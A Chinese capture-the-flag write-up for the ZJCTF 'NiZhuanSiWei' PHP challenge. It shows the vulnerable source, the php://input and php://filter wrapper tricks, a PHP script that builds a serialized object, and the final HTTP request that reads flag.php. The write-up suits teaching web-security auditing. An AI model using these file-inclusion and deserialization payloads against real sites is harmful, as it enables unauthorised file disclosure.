1. NiZhuanSiWei

代码审计题目,直接按常规审计思路做题即可
题目源代码

<?php  
// index.php

$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

首先用 php://input 伪协议过第一层if,接着用 php://filter 伪协议读取 useless.php

伪协议.png

<?php  
// useless.php

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

反序列化读取 flag.php
exp如下:

<?php
// exp.php

class Flag{  //flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}

$a = new Flag();
$a->file = 'flag.php';
echo serialize($a);

在useless.php触发反序列化
最终payload:

GET /?text=php://input&file=useless.php&password=O%3a4%3a"Flag"%3a1%3a{s%3a4%3a"file"%3bs%3a8%3a"flag.php"%3b} HTTP/1.1
Host: f3916eba-c013-41b6-b33f-06d4d285f5b3.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 20

welcome to the zjctf
Last modification:January 29th, 2020 at 06:47 pm
给肥宅一点零花钱买可乐叭 (゜-゜)つロ